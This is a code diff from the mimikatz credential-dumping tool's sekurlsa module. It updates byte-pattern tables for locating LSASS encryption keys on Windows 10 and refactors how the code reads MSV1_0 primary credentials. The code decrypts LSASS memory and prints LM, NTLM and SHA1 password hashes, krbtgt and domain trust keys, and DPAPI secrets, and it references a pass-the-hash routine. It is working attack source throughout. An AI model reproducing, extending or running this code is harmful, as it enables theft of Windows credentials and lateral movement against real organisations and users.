KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
#ifdef _M_X64
|
||||
LONG offset64;
|
||||
aLocalMemory.address = &offset64;
|
||||
|
||||
@ -13,7 +13,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY), PTRN_WNO8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {63, -69, 25}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY), PTRN_WNO8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {59, -61, 25}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY), PTRN_WIN8_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {62, -70, 23}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY},{0, NULL}, {61, -73, 16}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN10_LsaInitializeProtectedMemory_KEY), PTRN_WN10_LsaInitializeProtectedMemory_KEY},{0, NULL}, {61, -73, 16}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_LsaInitializeProtectedMemory_KEY[] = {0x6a, 0x02, 0x6a, 0x10, 0x68};
|
||||
@ -21,7 +21,7 @@ KULL_M_PATCH_GENERIC PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef[] = { // Init
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -76, -21}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -69, -18}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}}, // post 11/11
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_LsaInitializeProtectedMemory_KEY), PTRN_WALL_LsaInitializeProtectedMemory_KEY}, {0, NULL}, {5, -79, -22}},
|
||||
};
|
||||
|
||||
#endif
|
||||
@ -158,8 +158,7 @@ NTSTATUS kuhl_m_sekurlsa_nt6_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMemory, BO
|
||||
NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{lsassLsaSrvModule->DllBase.address, cLsass->hLsassMem}, lsassLsaSrvModule->SizeOfImage}, NULL};
|
||||
#ifdef _M_X64
|
||||
LONG offset64;
|
||||
@ -201,8 +200,7 @@ NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_
|
||||
BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M_SEKURLSA_OS_CONTEXT pOs, PKIWI_BCRYPT_GEN_KEY pGenKey)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&aLsassMemory->address, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KIWI_BCRYPT_HANDLE_KEY hKey; PKIWI_HARD_KEY pHardKey;
|
||||
PVOID buffer; SIZE_T taille; LONG offset;
|
||||
|
||||
|
||||
@ -66,8 +66,7 @@ NTSTATUS kuhl_m_sekurlsa_nt63_clean()
|
||||
NTSTATUS kuhl_m_sekurlsa_nt63_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule)
|
||||
{
|
||||
NTSTATUS status = STATUS_NOT_FOUND;
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {kuhl_m_sekurlsa_nt63_decryptorCode, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLocalAddr = {kuhl_m_sekurlsa_nt63_decryptorCode, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
aProcessUnprotect.hMemory = cLsass->hLsassMem;
|
||||
aProcessProtect.hMemory = cLsass->hLsassMem;
|
||||
|
||||
@ -99,8 +98,7 @@ VOID WINAPI kuhl_m_sekurlsa_nt63_LsaUnprotectMemory (IN PVOID Buffer, IN ULONG B
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_nt63_LsaEncryptMemory(IN PVOID Buffer, IN ULONG BufferSize, IN BOOL Encrypt)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aMemoryAddr = {NULL, aProcessProtect.hMemory}, aLocalAddr = {NULL, &hLocalBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aMemoryAddr = {NULL, aProcessProtect.hMemory}, aLocalAddr = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD exitCode, totalSize = sizeof(ULONG) + BufferSize;
|
||||
PKULL_M_MEMORY_ADDRESS pAddress = Encrypt ? &aProcessProtect : &aProcessUnprotect;
|
||||
NTSTATUS status;
|
||||
|
||||
@ -259,8 +259,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
|
||||
ULONG nbListes = 1, i;
|
||||
PVOID pStruct;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
BOOL retCallback = TRUE;
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
@ -294,7 +293,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
||||
{
|
||||
securityStruct.address = &LogonSessionList[i];
|
||||
data.address = &pStruct;
|
||||
data.hMemory = &hLocalMemory;
|
||||
data.hMemory = &KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
|
||||
{
|
||||
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
|
||||
@ -416,7 +415,7 @@ KULL_M_PATCH_GENERIC SecDataReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_W2K8_SecData), PTRN_W2K8_SecData}, {0, NULL}, { 11, 39}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_W2K12_SecData), PTRN_W2K12_SecData}, {0, NULL}, { 10, 39}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, {-12, 39}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, { -9, 39}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_W2K12R2_SecData), PTRN_W2K12R2_SecData}, {0, NULL}, { -9, 39}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_W2K3_SecData[] = {0x53, 0x56, 0x8d, 0x45, 0x98, 0x50, 0xb9};
|
||||
@ -431,8 +430,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
LONG l = 0;
|
||||
DUAL_KRBTGT dualKrbtgt = {NULL, NULL};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
@ -459,8 +457,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(addr)
|
||||
{
|
||||
@ -554,8 +551,7 @@ KULL_M_PATCH_GENERIC SysCredReferences[] = {
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
|
||||
{
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL;
|
||||
BOOL fSystemCredsInitialized;
|
||||
@ -617,8 +613,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
|
||||
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
|
||||
PVOID buffer;
|
||||
KDC_DOMAIN_INFO domainInfo;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {&domainInfo, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
|
||||
{
|
||||
@ -654,8 +649,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
|
||||
|
||||
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD i;
|
||||
PKDC_DOMAIN_KEYS domainKeys;
|
||||
|
||||
@ -718,8 +712,7 @@ void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
|
||||
|
||||
void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
GUID guid;
|
||||
DWORD cb;
|
||||
PVOID pGuid, pKeyLen, pKeyBuffer;
|
||||
@ -915,9 +908,7 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
|
||||
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, ULONG flags)
|
||||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PUNICODE_STRING username = NULL, domain = NULL, password = NULL;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_GENERIC pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
@ -925,6 +916,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
PWSTR sid = NULL;
|
||||
PBYTE msvCredentials;
|
||||
const MSV1_0_PRIMARY_HELPER * pMSVHelper;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
@ -932,77 +925,49 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
|
||||
{
|
||||
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
|
||||
credentials = (PUNICODE_STRING) mesCreds;
|
||||
if(credentials->Buffer)
|
||||
if(msvCredentials = (PBYTE) ((PUNICODE_STRING) mesCreds)->Buffer)
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
(*lsassLocalHelper->pLsaUnprotectMemory)(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
|
||||
switch(type)
|
||||
{
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
|
||||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
|
||||
if(pPrimaryCreds->isLmOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isNtOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isShaOwPassword)
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (pPrimaryCreds->isNtOwfPassword || pPrimaryCreds->ShaOwPassword))
|
||||
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds->isNtOwfPassword ? pPrimaryCreds->NtOwfPassword : NULL, pPrimaryCreds->isShaOwPassword ? pPrimaryCreds->ShaOwPassword : NULL, NULL, NULL);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
kprintf(L"\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
|
||||
if(!pPrimaryCreds10->isIso)
|
||||
{
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pMSVHelper = kuhl_m_sekurlsa_msv_helper(pData->cLsass);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain), FALSE);
|
||||
kull_m_string_MakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), FALSE);
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain));
|
||||
if(!pMSVHelper->offsetToisIso || !*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisIso))
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisLmOwfPassword))
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword))
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword))
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(msvCredentials + pMSVHelper->offsetToShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword) || *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword)))
|
||||
kuhl_m_dpapi_oe_credential_add(sid, NULL, *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword) ? msvCredentials + pMSVHelper->offsetToNtOwfPassword : NULL, *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword) ? msvCredentials + pMSVHelper->offsetToShaOwPassword : NULL, NULL, NULL);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (pPrimaryCreds10->isNtOwfPassword || pPrimaryCreds10->ShaOwPassword))
|
||||
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL);
|
||||
}
|
||||
else
|
||||
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
|
||||
break;
|
||||
else kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) (msvCredentials + pMSVHelper->offsetToIso + sizeof(USHORT)));
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) msvCredentials;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
|
||||
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base, sid);
|
||||
break;
|
||||
default:
|
||||
kprintf(L"\n\t * Raw data : ");
|
||||
kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1);
|
||||
kull_m_string_wprintf_hex(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length, 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -32,8 +32,7 @@
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10 0x00100000
|
||||
|
||||
@ -46,8 +46,7 @@ BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKUR
|
||||
|
||||
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{pLib->Informations.DllBase.address, cLsass->hLsassMem}, pLib->Informations.SizeOfImage}, NULL};
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
#ifdef _M_X64
|
||||
@ -104,8 +103,7 @@ BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL
|
||||
PVOID kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(PKULL_M_MEMORY_ADDRESS pSecurityStruct, ULONG LUIDoffset, PLUID luidToFind)
|
||||
{
|
||||
PVOID resultat = NULL, pStruct;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(aBuffer.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID)))
|
||||
{
|
||||
@ -137,8 +135,7 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable, ULONG
|
||||
{
|
||||
PVOID resultat = NULL;
|
||||
RTL_AVL_TABLE maTable;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
|
||||
{
|
||||
@ -152,8 +149,7 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
|
||||
{
|
||||
PVOID resultat = NULL;
|
||||
RTL_AVL_TABLE maTable;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
|
||||
{
|
||||
|
||||
@ -45,8 +45,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURIT
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
